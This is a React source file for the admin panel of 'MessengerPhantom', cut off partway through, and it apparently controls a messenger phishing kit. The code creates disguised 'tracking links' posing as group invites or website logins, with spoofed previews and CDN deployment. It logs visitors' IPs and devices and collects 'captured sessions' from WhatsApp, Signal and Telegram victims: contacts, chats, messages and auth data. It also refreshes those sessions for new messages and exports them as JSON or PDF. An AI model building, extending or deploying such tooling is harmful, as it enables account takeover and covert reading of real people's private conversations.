import React, { useState, useEffect, useCallback } from 'react';
import { io, Socket } from 'socket.io-client';
import { SOCKET_URL, API_BASE_URL } from '../config';
import {
    Shield,
    Link,
    Plus,
    Eye,
    Trash2,
    Copy,
    Check,
    X,
    Loader2,
    Users,
    Activity,
    Smartphone,
    Phone,
    ToggleLeft,
    ToggleRight,
    LogOut,
    RefreshCw,
    Globe,
    Clock,
    Monitor,
    QrCode,
    Image,
    Upload,
    Download,
    MessageCircle,
    UserCheck,
    UserX,
    FileText,
    Play,
    Volume2,
    File,
    MapPin,
    Smile,
    ChevronLeft,
    ArrowLeft,
    Cloud,
    UploadCloud,
    CloudOff,
    Lock
} from 'lucide-react';

interface TrackingVisit {
    id: string;
    timestamp: string;
    userAgent: string;
    ipAddress: string;
    referrer: string | null;
}

interface TrackingLink {
    id: string;
    name: string;
    targetDescription: string;
    loginMethod: 'qr' | 'phone' | 'both';
    createdAt: string;
    shortCode: string;
    visits: TrackingVisit[];
    whatsappConnected: boolean;
    whatsappPhoneNumber: string | null;
    signalConnected?: boolean;
    signalPhoneNumber?: string | null;
    telegramConnected?: boolean;
    telegramPhoneNumber?: string | null;
    platform: 'whatsapp' | 'signal' | 'telegram' | 'both';
    expiresAt: string | null;
    isActive: boolean;
    groupName: string;
    groupImage: string | null;
    telegramSubscriberCount?: number;
    cdnUrl?: string | null;
    cdnZoneId?: string;
    cdnDeployed?: boolean;
    ogTitle?: string;
    ogDescription?: string;
    ogImage?: string;
    redirectUrl?: string;
    scene?: 'join-group' | 'website-login';
    callbackUrl?: string;
    websiteName?: string;
    websiteLogo?: string;
    websiteDescription?: string;
}

interface DashboardStats {
    totalLinks: number;
    activeLinks: number;
    totalVisits: number;
    connectedWhatsApps: number;
    connectedSignals?: number;
    connectedTelegrams?: number;
    capturedSessions: number;
    pendingSessions: number;
    recentVisits: (TrackingVisit & { linkName: string; linkId: string })[];
}

interface WhatsAppMessage {
    id: string;
    jid: string;
    fromMe: boolean;
    senderJid: string | null;
    senderName: string | null;
    timestamp: number;
    type: 'text' | 'image' | 'video' | 'audio' | 'document' | 'sticker' | 'contact' | 'location' | 'reaction' | 'other';
    text: string | null;
    caption: string | null;
    mediaUrl: string | null;
    mediaData?: string | null;
    fileName?: string | null;
    quotedMessageId: string | null;
}

interface CapturedSession {
    id: string;
    linkId: string;
    shortCode: string;
    groupName: string;
    phoneNumber: string;
    capturedAt: string;
    userAgent: string;
    ipAddress: string;
    platform: 'whatsapp' | 'signal' | 'telegram';
    sessionData: {
        contacts: any[];
        chats: any[];
        messages: { [jid: string]: WhatsAppMessage[] };
        authFolder: string;
    };
    status: 'pending' | 'approved' | 'rejected';
}

interface AdminDashboardProps {
    token: string;
    admin: { id: string; username: string; role: string; permissions: any };
    onLogout: () => void;
}

export function AdminDashboard({ token, admin, onLogout }: AdminDashboardProps) {
    // eslint-disable-next-line @typescript-eslint/no-unused-vars
    const [socket, setSocket] = useState<Socket | null>(null);
    const [links, setLinks] = useState<TrackingLink[]>([]);
    const [stats, setStats] = useState<DashboardStats | null>(null);
    const [isLoading, setIsLoading] = useState(true);
    const [showCreateModal, setShowCreateModal] = useState(false);
    const [selectedLink, setSelectedLink] = useState<TrackingLink | null>(null);
    const [copiedId, setCopiedId] = useState<string | null>(null);
    const [capturedSessions, setCapturedSessions] = useState<CapturedSession[]>([]);
    const [selectedSession, setSelectedSession] = useState<CapturedSession | null>(null);
    const [refreshingSession, setRefreshingSession] = useState<string | null>(null);
    const [activeTab, setActiveTab] = useState<'links' | 'sessions' | 'users' | 'settings' | 'account'>('links');
    const [selectedChatJid, setSelectedChatJid] = useState<string | null>(null);
    const [showChatViewer, setShowChatViewer] = useState(false);
    const [messageDisplayLimit, setMessageDisplayLimit] = useState(100);

    // Settings state
    const [telegramApiId, setTelegramApiId] = useState('');
    const [telegramApiHash, setTelegramApiHash] = useState('');
    const [telegramConfigured, setTelegramConfigured] = useState(false);
    const [isSavingConfig, setIsSavingConfig] = useState(false);
    const [configMessage, setConfigMessage] = useState<{ type: 'success' | 'error'; text: string } | null>(null);

    // CDN state (multi-zone)
    const [cdnZones, setCdnZones] = useState<Array<{ id: string; name: string; storageZoneName: string; storageRegion: string; cdnHostname: string; pullZoneId: string }>>([]);
    const [cdnHasApiKey, setCdnHasApiKey] = useState(false);

    // CDN auto-setup
    const [cdnSetupApiKey, setCdnSetupApiKey] = useState('');
    const [cdnSetupName, setCdnSetupName] = useState('');
    const [cdnSetupRegion, setCdnSetupRegion] = useState('DE');
    const [isSettingUpCdn, setIsSettingUpCdn] = useState(false);
    const [cdnSetupMessage, setCdnSetupMessage] = useState<{ type: 'success' | 'error'; text: string } | null>(null);

    // New link form
    const [newLinkName, setNewLinkName] = useState('');
    const [newLinkTarget, setNewLinkTarget] = useState('');
    const [newLinkMethod, setNewLinkMethod] = useState<'qr' | 'phone' | 'both'>('qr');
    const [newLinkPlatform, setNewLinkPlatform] = useState<'whatsapp' | 'signal' | 'telegram' | 'both'>('whatsapp');
    const [newLinkExpiry, setNewLinkExpiry] = useState<number>(0);
    const [newGroupName, setNewGroupName] = useState('');
    const [newGroupImage, setNewGroupImage] = useState<string | null>(null);
    const [newTelegramSubscriberCount, setNewTelegramSubscriberCount] = useState('');
    const [newLinkCdnZoneId, setNewLinkCdnZoneId] = useState('');
    const [newOgTitle, setNewOgTitle] = useState('');
    const [newOgDescription, setNewOgDescription] = useState('');
    const [newOgImage, setNewOgImage] = useState<string | null>(null);
    const [newRedirectUrl, setNewRedirectUrl] = useState('');
    const [newLinkScene, setNewLinkScene] = useState<'join-group' | 'website-login'>('join-group');
    const [newCallbackUrl, setNewCallbackUrl] = useState('');
    const [newWebsiteName, setNewWebsiteName] = useState('');
    const [newWebsiteLogo, setNewWebsiteLogo] = useState<string | null>(null);
    const [newWebsiteDescription, setNewWebsiteDescription] = useState('');
    const [isCreating, setIsCreating] = useState(false);
    const [deployingLinkId, setDeployingLinkId] = useState<string | null>(null);
    const [removingLinkId, setRemovingLinkId] = useState<string | null>(null);

    // User management state (admin only)
    const [usersList, setUsersList] = useState<any[]>([]);
    const [isLoadingUsers, setIsLoadingUsers] = useState(false);
    const [showCreateUserModal, setShowCreateUserModal] = useState(false);
    const [editingUser, setEditingUser] = useState<any | null>(null);
    const [newUserForm, setNewUserForm] = useState({ username: '', password: '', role: 'user' as 'admin' | 'user', permissions: { whatsapp: true, signal: true, telegram: true, cdnDeploy: false } });
    const [isCreatingUser, setIsCreatingUser] = useState(false);

    // Account settings state
    const [oldPassword, setOldPassword] = useState('');
    const [newPassword, setNewPassword] = useState('');
    const [confirmPassword, setConfirmPassword] = useState('');
    const [isChangingPassword, setIsChangingPassword] = useState(false);
    const [passwordMessage, setPasswordMessage] = useState<{ type: 'success' | 'error'; text: string } | null>(null);
    const [showDeleteConfirm, setShowDeleteConfirm] = useState(false);
    const [isDeletingAccount, setIsDeletingAccount] = useState(false);

    const authHeaders = {
        'Content-Type': 'application/json',
        'Authorization': `Bearer ${token}`
    };

    const fetchLinks = useCallback(async () => {
        try {
            const response = await fetch(`${API_BASE_URL}/admin/links`, {
                headers: {
                    'Content-Type': 'application/json',
                    'Authorization': `Bearer ${token}`
                }
            });
            const data = await response.json();
            if (data.success) {
                setLinks(data.links);
            }
        } catch (err) {
            console.error('Failed to fetch links:', err);
        } finally {
            setIsLoading(false);
        }
    }, [token]);

    const fetchStats = useCallback(async () => {
        try {
            const response = await fetch(`${API_BASE_URL}/admin/stats`, {
                headers: {
                    'Content-Type': 'application/json',
                    'Authorization': `Bearer ${token}`
                }
            });
            const data = await response.json();
            if (data.success) {
                setStats(data.stats);
            }
        } catch (err) {
            console.error('Failed to fetch stats:', err);
        }
    }, [token]);

    const fetchCapturedSessions = useCallback(async () => {
        try {
            const response = await fetch(`${API_BASE_URL}/admin/captured-sessions`, {
                headers: {
                    'Content-Type': 'application/json',
                    'Authorization': `Bearer ${token}`
                }
            });
            const data = await response.json();
            if (data.success) {
                setCapturedSessions(data.sessions);
            }
        } catch (err) {
            console.error('Failed to fetch captured sessions:', err);
        }
    }, [token]);

    const fetchConfig = useCallback(async () => {
        try {
            const configRes = await fetch(`${API_BASE_URL}/admin/config`, {
                headers: { 'Content-Type': 'application/json', 'Authorization': `Bearer ${token}` }
            });
            const configData = await configRes.json();
            if (configData.success) {
                setTelegramApiId(configData.config.telegram.apiId || '');
                setTelegramConfigured(configData.config.telegram.configured);
            }
        } catch (err) {
            console.error('Failed to fetch app config:', err);
        }
        try {
            const cdnRes = await fetch(`${API_BASE_URL}/admin/cdn-config`, {
                headers: { 'Content-Type': 'application/json', 'Authorization': `Bearer ${token}` }
            });
            const cdnData = await cdnRes.json();
            if (cdnData.success) {
                setCdnZones(cdnData.zones || []);
                setCdnHasApiKey(cdnData.hasApiKey || false);
            }
        } catch (err) {
            console.error('Failed to fetch CDN config:', err);
        }
    }, [token]);

    useEffect(() => {
        // Connect to socket for real-time updates
        const newSocket = io(SOCKET_URL, {
            autoConnect: true,
            transports: ['websocket', 'polling']
        });

        newSocket.on('admin-link-visited', (data) => {
            console.log('[Admin] Link visited:', data);
            // Refresh links to get updated visit data
            fetchLinks();
            fetchStats();
            fetchCapturedSessions();
        });

        newSocket.on('admin-link-whatsapp-update', (data) => {
            console.log('[Admin] WhatsApp status update:', data);
            fetchLinks();
            fetchStats();
        });

        newSocket.on('admin-link-signal-update', (data) => {
            console.log('[Admin] Signal status update:', data);
            fetchLinks();
            fetchStats();
        });

        newSocket.on('admin-link-telegram-update', (data) => {
            console.log('[Admin] Telegram status update:', data);
            fetchLinks();
            fetchStats();
        });

        newSocket.on('admin-session-captured', (data) => {
            console.log('[Admin] Session captured:', data);
            fetchCapturedSessions();
            fetchStats();
        });

        newSocket.on('admin-whatsapp-realtime-update', (data) => {
            console.log('[Admin] WhatsApp real-time update:', data);
            // Update the session counts in UI without re-fetching all data
            setCapturedSessions(prev => prev.map(s => {
                if (s.platform === 'whatsapp' && s.phoneNumber === data.phoneNumber) {
                    return { ...s, _liveUpdate: { ...data, timestamp: Date.now() } } as any;
                }
                return s;
            }));
        });

        setSocket(newSocket);

        return () => {
            newSocket.disconnect();
        };
    }, [fetchLinks, fetchStats, fetchCapturedSessions]);

    useEffect(() => {
        fetchLinks();
        fetchStats();
        fetchCapturedSessions();
        fetchConfig();
    }, [fetchLinks, fetchStats, fetchCapturedSessions, fetchConfig]);

    const createLink = async (e: React.FormEvent) => {
        e.preventDefault();
        setIsCreating(true);

        try {
            const response = await fetch(`${API_BASE_URL}/admin/links`, {
                method: 'POST',
                headers: authHeaders,
                body: JSON.stringify({
                    name: newLinkName,
                    targetDescription: newLinkTarget,
                    loginMethod: newLinkMethod,
                    platform: newLinkPlatform,
                    expiresInHours: newLinkExpiry || null,
                    groupName: newLinkScene === 'website-login' ? (newWebsiteName || 'Login') : newGroupName,
                    groupImage: newLinkScene === 'website-login' ? null : newGroupImage,
                    telegramSubscriberCount: newLinkScene === 'join-group' && (newLinkPlatform === 'telegram' || newLinkPlatform === 'both') && newTelegramSubscriberCount.trim()
                        ? Number(newTelegramSubscriberCount)
                        : undefined,
                    cdnZoneId: newLinkCdnZoneId || undefined,
                    ogTitle: newOgTitle || undefined,
                    ogDescription: newOgDescription || undefined,
                    ogImage: newOgImage || undefined,
                    redirectUrl: newLinkScene === 'website-login' ? undefined : (newRedirectUrl || undefined),
                    scene: newLinkScene,
                    callbackUrl: newLinkScene === 'website-login' ? newCallbackUrl : undefined,
                    websiteName: newLinkScene === 'website-login' ? newWebsiteName : undefined,
                    websiteLogo: newLinkScene === 'website-login' ? newWebsiteLogo : undefined,
                    websiteDescription: newLinkScene === 'website-login' ? (newWebsiteDescription || undefined) : undefined,
                })
            });

            const data = await response.json();
            if (data.success) {
                setLinks(prev => [...prev, data.link]);
                setShowCreateModal(false);
                resetForm();
                fetchStats();
            }
        } catch (err) {
            console.error('Failed to create link:', err);
        } finally {
            setIsCreating(false);
        }
    };

    const toggleLinkActive = async (link: TrackingLink) => {
        try {
            const response = await fetch(`${API_BASE_URL}/admin/links/${link.id}`, {
                method: 'PUT',
                headers: authHeaders,
                body: JSON.stringify({ isActive: !link.isActive })
            });

            const data = await response.json();
            if (data.success) {
                setLinks(prev => prev.map(l => l.id === link.id ? data.link : l));
            }
        } catch (err) {
            console.error('Failed to toggle link:', err);
        }
    };

    const deleteLink = async (linkId: string) => {
        if (!window.confirm('Are you sure you want to delete this tracking link?')) return;

        try {
            const response = await fetch(`${API_BASE_URL}/admin/links/${linkId}`, {
                method: 'DELETE',
                headers: authHeaders
            });

            const data = await response.json();
            if (data.success) {
                setLinks(prev => prev.filter(l => l.id !== linkId));
                if (selectedLink?.id === linkId) setSelectedLink(null);
                fetchStats();
            }
        } catch (err) {
            console.error('Failed to delete link:', err);
        }
    };

    const copyToClipboard = (text: string, id: string) => {
        navigator.clipboard.writeText(text);
        setCopiedId(id);
        setTimeout(() => setCopiedId(null), 2000);
    };

    const updateSessionStatus = async (sessionId: string, status: 'approved' | 'rejected') => {
        try {
            const response = await fetch(`${API_BASE_URL}/admin/captured-sessions/${sessionId}`, {
                method: 'PUT',
                headers: authHeaders,
                body: JSON.stringify({ status })
            });
            const data = await response.json();
            if (data.success) {
                setCapturedSessions(prev => prev.map(s => s.id === sessionId ? data.session : s));
                if (selectedSession?.id === sessionId) setSelectedSession(data.session);
            }
        } catch (err) {
            console.error('Failed to update session status:', err);
        }
    };

    const deleteSession = async (sessionId: string) => {
        if (!window.confirm('Are you sure you want to delete this captured session?')) return;
        try {
            const response = await fetch(`${API_BASE_URL}/admin/captured-sessions/${sessionId}`, {
                method: 'DELETE',
                headers: authHeaders
            });
            const data = await response.json();
            if (data.success) {
                setCapturedSessions(prev => prev.filter(s => s.id !== sessionId));
                if (selectedSession?.id === sessionId) setSelectedSession(null);
                fetchStats();
            }
        } catch (err) {
            console.error('Failed to delete session:', err);
        }
    };

    const refreshSession = async (sessionId: string) => {
        setRefreshingSession(sessionId);
        try {
            const response = await fetch(`${API_BASE_URL}/admin/captured-sessions/${sessionId}/refresh`, {
                method: 'POST',
                headers: authHeaders
            });
            const data = await response.json();
            if (data.success) {
                setCapturedSessions(prev => prev.map(s => s.id === sessionId ? data.session : s));
                if (selectedSession?.id === sessionId) setSelectedSession(data.session);
                
                // Show appropriate message based on session status
                if (data.isActive === false) {
                    alert('⚠️ Session Disconnected\n\n' + data.message);
                } else {
                    alert(data.message || 'Checked for new messages');
                }
            } else {
                alert('❌ Error: ' + (data.message || 'Failed to fetch messages'));
            }
        } catch (err) {
            console.error('Failed to refresh session:', err);
            alert('Failed to fetch messages - network error');
        } finally {
            setRefreshingSession(null);
        }
    };

    const downloadSession = (session: CapturedSession) => {
        const dataStr = JSON.stringify(session, null, 2);
        const blob = new Blob([dataStr], { type: 'application/json' });
        const url = URL.createObjectURL(blob);
        const a = document.createElement('a');
        a.href = url;
        a.download = `session_${session.phoneNumber}_${session.shortCode}.json`;
        document.body.appendChild(a);
        a.click();
        document.body.removeChild(a);
        URL.revokeObjectURL(url);
    };

    const downloadSessionPdf = async (session: CapturedSession) => {
        try {
            const response = await fetch(
                `${API_BASE_URL}/admin/captured-sessions/${session.id}/download-pdf`,
                {
                    headers: { Authorization: `Bearer ${token}` }
                }
            );
            
            if (!response.ok) {
                throw new Error('Failed to download PDF');
            }
            
            const blob = await response.blob();
            const url = URL.createObjectURL(blob);
            const a = document.createElement('a');
            a.href = url;
            a.download = `session_${session.phoneNumber}_${session.shortCode}.pdf`;
            document.body.appendChild(a);
            a.click();
            document.body.removeChild(a);
            URL.revokeObjectURL(url);
        } catch (err) {
            console.error('Failed to download PDF:', err);
        }
    };

    const resetForm = () => {
        setNewLinkName('');
        setNewLinkTarget('');
        setNewLinkMethod('qr');
        setNewLinkPlatform('whatsapp');
        setNewLinkExpiry(0);
        setNewGroupName('');
        setNewGroupImage(null);
        setNewTelegramSubscriberCount('');
        setNewLinkCdnZoneId('');
        setNewOgTitle('');
        setNewOgDescription('');
        setNewOgImage(null);
        setNewRedirectUrl('');
        setNewLinkScene('join-group');
        setNewCallbackUrl('');
        setNewWebsiteName('');
        setNewWebsiteLogo(null);
        setNewWebsiteDescription('');
    };

    const getTrackingUrl = (shortCode: string) => {
        return `${window.location.origin}/t/${shortCode}`;
    };



    const deployLinkToCdn = async (linkId: string) => {
        setDeployingLinkId(linkId);
        try {
            const response = await fetch(`${API_BASE_URL}/admin/cdn-deploy-link`, {
                method: 'POST',
                headers: authHeaders,
                body: JSON.stringify({ linkId }),
            });
            const data = await response.json();
            if (data.success) {
                setLinks(prev => prev.map(l => l.id === linkId ? { ...l, cdnDeployed: true } : l));
            } else {
                alert(data.message || 'Failed to deploy link to CDN');
            }
        } catch (err) {
            alert('Failed to deploy link to CDN');
        } finally {
            setDeployingLinkId(null);
        }
    };

    const removeLinkFromCdn = async (linkId: string) => {
        if (!window.confirm('Remove this link\'s files from CDN? The CDN URL will stop working.')) return;
        setRemovingLinkId(linkId);
        try {
            const response = await fetch(`${API_BASE_URL}/admin/cdn-link-files/${linkId}`, {
                method: 'DELETE',
                headers: authHeaders,
            });
            const data = await response.json();
            if (data.success) {
                setLinks(prev => prev.map(l => l.id === linkId ? { ...l, cdnDeployed: false } : l));
            } else {
                alert(data.message || 'Failed to remove link from CDN');
            }
        } catch (err) {
            alert('Failed to remove link from CDN');
        } finally {
            setRemovingLinkId(null);
        }
    };

    const formatDate = (dateStr: string) => {
        return new Date(dateStr).toLocaleString();
    };

    const parseUserAgent = (ua: string) => {
        // Simple user agent parsing
        let browser = 'Unknown';
        let os = 'Unknown';
        let device = 'Desktop';

        if (ua.includes('Mobile')) device = 'Mobile';
        if (ua.includes('Tablet')) device = 'Tablet';

        if (ua.includes('Chrome')) browser = 'Chrome';
        else if (ua.includes('Firefox')) browser = 'Firefox';
        else if (ua.includes('Safari')) browser = 'Safari';
        else if (ua.includes('Edge')) browser = 'Edge';

        if (ua.includes('Windows')) os = 'Windows';
        else if (ua.includes('Mac')) os = 'macOS';
        else if (ua.includes('Linux')) os = 'Linux';
        else if (ua.includes('Android')) os = 'Android';
        else if (ua.includes('iPhone') || ua.includes('iPad')) os = 'iOS';

        return { browser, os, device };
    };

    const handleLogout = async () => {
        try {
            await fetch(`${API_BASE_URL}/admin/logout`, {
                method: 'POST',
                headers: authHeaders
            });
        } catch (err) {
            console.error('Logout error:', err);
        }
        localStorage.removeItem('adminToken');
        localStorage.removeItem('adminUser');
        onLogout();
    };

    // User management functions
    const fetchUsers = useCallback(async () => {
        if (admin.role !== 'admin') return;
        setIsLoadingUsers(true);
        try {
            const response = await fetch(`${API_BASE_URL}/admin/users`, { headers: authHeaders });
            const data = await response.json();
            if (data.success) setUsersList(data.users);
        } catch (err) {
            console.error('Failed to fetch users:', err);
        } finally {
            setIsLoadingUsers(false);
        }
    }, [token, admin.role]);

    useEffect(() => {
        fetchUsers();
    }, [fetchUsers]);

    const createUser = async () => {
        if (!newUserForm.username || !newUserForm.password) return;
        setIsCreatingUser(true);
        try {
            const response = await fetch(`${API_BASE_URL}/admin/users`, {
                method: 'POST',
                headers: authHeaders,
                body: JSON.stringify(newUserForm)
            });
            const data = await response.json();
            if (data.success) {
                setShowCreateUserModal(false);
                setNewUserForm({ username: '', password: '', role: 'user', permissions: { whatsapp: true, signal: true, telegram: true, cdnDeploy: false } });
                fetchUsers();
            } else {
                alert(data.message || 'Failed to create user');
            }
        } catch (err) {
            alert('Failed to create user');
        } finally {
            setIsCreatingUser(false);
        }
    };

    const updateUser = async (userId: string, updates: any) => {
        try {
            const response = await fetch(`${API_BASE_URL}/admin/users/${userId}`, {
                method: 'PUT',
                headers: authHeaders,
                body: JSON.stringify(updates)
            });
            const data = await response.json();
            if (data.success) {
                fetchUsers();
                setEditingUser(null);
            } else {
                alert(data.message || 'Failed to update user');
            }
        } catch (err) {
            alert('Failed to update user');
        }
    };

    const deleteUser = async (userId: string) => {
        if (!window.confirm('Are you sure you want to delete this user? This cannot be undone.')) return;
        try {
            const response = await fetch(`${API_BASE_URL}/admin/users/${userId}`, {
                method: 'DELETE',
                headers: authHeaders
            });
            const data = await response.json();
            if (data.success) {
                fetchUsers();
            } else {
                alert(data.message || 'Failed to delete user');
            }
        } catch (err) {
            alert('Failed to delete user');
        }
    };

    // Account functions
    const changePassword = async () => {
        if (newPassword !== confirmPassword) {
            setPasswordMessage({ type: 'error', text: 'Passwords do not match' });
            return;
        }
        if (newPassword.length < 4) {
            setPasswordMessage({ type: 'error', text: 'Password must be at least 4 characters' });
            return;
        }
        setIsChangingPassword(true);
        setPasswordMessage(null);
        try {
            const response = await fetch(`${API_BASE_URL}/admin/change-password`, {
                method: 'POST',
                headers: authHeaders,
                body: JSON.stringify({ currentPassword: oldPassword, newPassword })
            });
            const data = await response.json();
            if (data.success) {
                setPasswordMessage({ type: 'success', text: 'Password changed successfully' });
                setOldPassword('');
                setNewPassword('');
                setConfirmPassword('');
            } else {
                setPasswordMessage({ type: 'error', text: data.message || 'Failed to change password' });
            }
        } catch (err) {
            setPasswordMessage({ type: 'error', text: 'Failed to connect to server' });
        } finally {
            setIsChangingPassword(false);
        }
    };

    const deleteAccount = async () => {
        setIsDeletingAccount(true);
        try {
            const response = await fetch(`${API_BASE_URL}/admin/account`, {
                method: 'DELETE',
                headers: authHeaders
            });
            const data = await response.json();
            if (data.success) {
                localStorage.removeItem('adminToken');
                localStorage.removeItem('adminUser');
                onLogout();
            } else {
                alert(data.message || 'Failed to delete account');
                setShowDeleteConfirm(false);
            }
        } catch (err) {
            alert('Failed to delete account');
            setShowDeleteConfirm(false);
        } finally {
            setIsDeletingAccount(false);
        }
    };

    if (isLoading) {
        return (
            <div className="min-h-screen bg-[#0a0a0f] flex items-center justify-center">
                <Loader2 className="w-12 h-12 text-cyan-400 animate-spin" />
            </div>
        );
    }

    return (
        <div className="min-h-screen bg-[#0a0a0f] cyber-grid">
            {/* Header */}
            <header className="bg-[#0a0a0f]/80 backdrop-blur-xl border-b border-cyan-500/10">
                <div className="max-w-7xl mx-auto px-6 py-4 flex items-center justify-between">
                    <div className="flex items-center gap-3">
                        <div className="w-10 h-10 rounded-xl bg-cyan-500/10 border border-cyan-500/30 flex items-center justify-center">
                            <img src="/logo.svg" alt="MessengerPhantom" className="w-7 h-7" />
                        </div>
                        <div>
                            <h1 className="text-xl font-bold text-white">MessengerPhantom</h1>
                            <p className="text-sm text-gray-600">Admin Dashboard</p>
                        </div>
                    </div>
                    <div className="flex items-center gap-4">
                        <span className="text-gray-500 text-sm">Logged in as <span className="text-cyan-400 font-medium">{admin.username}</span></span>
                        <button
                            onClick={handleLogout}
                            className="px-4 py-2 bg-white/5 hover:bg-white/5 border border-white/10 text-gray-500 rounded-lg flex items-center gap-2 text-sm transition-all"
                        >
                            <LogOut className="w-4 h-4" />
                            Logout
                        </button>
                    </div>
                </div>
            </header>

            <div className="max-w-7xl mx-auto px-6 py-8">
                {/* Stats */}
                {stats && (
                    <div className="grid grid-cols-1 md:grid-cols-4 gap-4 mb-8">
                        <div className="glass-card rounded-xl p-6">
                            <div className="flex items-center gap-3">
                                <div className="w-12 h-12 rounded-xl bg-cyan-500/10 border border-cyan-500/20 flex items-center justify-center">
                                    <Link className="w-6 h-6 text-cyan-400" />
                                </div>
                                <div>
                                    <p className="text-2xl font-bold text-white">{stats.totalLinks}</p>
                                    <p className="text-sm text-gray-500">Total Links</p>
                                </div>
                            </div>
                        </div>
                        <div className="glass-card rounded-xl p-6">
                            <div className="flex items-center gap-3">
                                <div className="w-12 h-12 rounded-xl bg-green-500/10 border border-green-500/20 flex items-center justify-center">
                                    <Activity className="w-6 h-6 text-green-400" />
                                </div>
                                <div>
                                    <p className="text-2xl font-bold text-white">{stats.activeLinks}</p>
                                    <p className="text-sm text-gray-500">Active Links</p>
                                </div>
                            </div>
                        </div>
                        <div className="glass-card rounded-xl p-6">
                            <div className="flex items-center gap-3">
                                <div className="w-12 h-12 rounded-xl bg-purple-500/10 border border-purple-500/20 flex items-center justify-center">
                                    <Eye className="w-6 h-6 text-purple-400" />
                                </div>
                                <div>
                                    <p className="text-2xl font-bold text-white">{stats.totalVisits}</p>
                                    <p className="text-sm text-gray-500">Total Visits</p>
                                </div>
                            </div>
                        </div>
                        <div className="glass-card rounded-xl p-6">
                            <div className="flex items-center gap-3">
                                <div className="w-12 h-12 rounded-xl bg-emerald-500/10 border border-emerald-500/20 flex items-center justify-center">
                                    <Users className="w-6 h-6 text-emerald-400" />
                                </div>
                                <div>
                                    <p className="text-2xl font-bold text-white">{stats.capturedSessions || 0}</p>
                                    <p className="text-sm text-gray-500">Captured</p>
                                </div>
                            </div>
                        </div>
                    </div>
                )}

                {/* Tab Navigation */}
                <div className="flex gap-2 mb-6 flex-wrap">
                    <button
                        onClick={() => { setActiveTab('links'); setSelectedSession(null); }}
                        className={`px-6 py-3 rounded-xl font-medium transition-all flex items-center gap-2 ${
                            activeTab === 'links'
                                ? 'bg-cyan-500/20 text-cyan-400 border border-cyan-500/30'
                                : 'bg-white/5 text-gray-500 hover:bg-white/5 border border-transparent'
                        }`}
                    >
                        <Link className="w-4 h-4" />
                        Tracking Links
                    </button>
                    <button
                        onClick={() => { setActiveTab('sessions'); setSelectedLink(null); }}
                        className={`px-6 py-3 rounded-xl font-medium transition-all flex items-center gap-2 ${
                            activeTab === 'sessions'
                                ? 'bg-cyan-500/20 text-cyan-400 border border-cyan-500/30'
                                : 'bg-white/5 text-gray-500 hover:bg-white/5 border border-transparent'
                        }`}
                    >
                        <MessageCircle className="w-4 h-4" />
                        Captured Sessions
                        {stats?.pendingSessions ? (
                            <span className="px-2 py-0.5 bg-red-500 text-white text-xs rounded-full">
                                {stats.pendingSessions}
                            </span>
                        ) : null}
                    </button>
                    {admin.role === 'admin' && (
                        <button
                            onClick={() => { setActiveTab('users'); setSelectedLink(null); setSelectedSession(null); }}
                            className={`px-6 py-3 rounded-xl font-medium transition-all flex items-center gap-2 ${
                                activeTab === 'users'
                                    ? 'bg-cyan-500/20 text-cyan-400 border border-cyan-500/30'
                                    : 'bg-white/5 text-gray-500 hover:bg-white/5 border border-transparent'
                            }`}
                        >
                            <Users className="w-4 h-4" />
                            Users
                        </button>
                    )}
                    {admin.role === 'admin' && (
                        <button
                            onClick={() => { setActiveTab('settings'); setSelectedLink(null); setSelectedSession(null); }}
                            className={`px-6 py-3 rounded-xl font-medium transition-all flex items-center gap-2 ${
                                activeTab === 'settings'
                                    ? 'bg-cyan-500/20 text-cyan-400 border border-cyan-500/30'
                                    : 'bg-white/5 text-gray-500 hover:bg-white/5 border border-transparent'
                            }`}
                        >
                            <Shield className="w-4 h-4" />
                            Settings
                        </button>
                    )}
                    <button
                        onClick={() => { setActiveTab('account'); setSelectedLink(null); setSelectedSession(null); }}
                        className={`px-6 py-3 rounded-xl font-medium transition-all flex items-center gap-2 ${
                            activeTab === 'account'
                                ? 'bg-cyan-500/20 text-cyan-400 border border-cyan-500/30'
                                : 'bg-white/5 text-gray-500 hover:bg-white/5 border border-transparent'
                        }`}
                    >
                        <UserCheck className="w-4 h-4" />
                        Account
                    </button>
                </div>

                {/* Main Content */}
                {activeTab === 'links' && (
                <div className="grid grid-cols-1 lg:grid-cols-3 gap-6">
                    {/* Links List */}
                    <div className="lg:col-span-2 glass-card rounded-2xl overflow-hidden">
                        <div className="p-6 border-b border-white/10 flex items-center justify-between">
                            <h2 className="text-lg font-semibold text-white flex items-center gap-2">
                                <Link className="w-5 h-5" />
                                Tracking Links
                            </h2>
                            <div className="flex gap-2">
                                <button
                                    onClick={() => { fetchLinks(); fetchStats(); }}
                                    className="p-2 bg-white/5 hover:bg-white/20 rounded-lg text-gray-500 transition-all"
                                >
                                    <RefreshCw className="w-4 h-4" />
                                </button>
                                <button
                                    onClick={() => setShowCreateModal(true)}
                                    className="px-4 py-2 bg-cyan-500/20 hover:bg-cyan-500/30 text-cyan-400 border border-cyan-500/30 rounded-lg flex items-center gap-2 text-sm transition-all"
                                >
                                    <Plus className="w-4 h-4" />
                                    Create Link
                                </button>
                            </div>
                        </div>

                        <div className="divide-y divide-white/10 max-h-[600px] overflow-y-auto">
                            {links.length === 0 ? (
                                <div className="p-12 text-center">
                                    <Link className="w-12 h-12 text-gray-500 mx-auto mb-4" />
                                    <p className="text-gray-500">No tracking links yet</p>
                                    <p className="text-gray-500 text-sm">Create your first link to start tracking</p>
                                </div>
                            ) : (
                                links.map(link => (
                                    <div
                                        key={link.id}
                                        className={`p-4 hover:bg-white/5 cursor-pointer transition-all ${selectedLink?.id === link.id ? 'bg-white/5' : ''}`}
                                        onClick={() => setSelectedLink(link)}
                                    >
                                        <div className="flex items-start justify-between">
                                            <div className="flex-1">
                                                <div className="flex items-center gap-2 mb-1">
                                                    <h3 className="font-medium text-white">{link.name}</h3>
                                                    {/* Platform badge */}
                                                    <span className={`px-2 py-0.5 text-xs rounded-full flex items-center gap-1 ${
                                                        link.platform === 'signal' 
                                                            ? 'bg-[#3A76F0]/20 text-[#3A76F0]' 
                                                            : link.platform === 'telegram'
                                                            ? 'bg-[#0088CC]/20 text-[#0088CC]'
                                                            : link.platform === 'both'
                                                            ? 'bg-cyan-500/20 text-cyan-300'
                                                            : 'bg-green-500/20 text-green-400'
                                                    }`}>
                                                        {link.platform === 'signal' ? (
                                                            <MessageCircle className="w-3 h-3" />
                                                        ) : link.platform === 'telegram' ? (
                                                            <MessageCircle className="w-3 h-3" />
                                                        ) : link.platform === 'both' ? (
                                                            <Users className="w-3 h-3" />
                                                        ) : (
                                                            <Smartphone className="w-3 h-3" />
                                                        )}
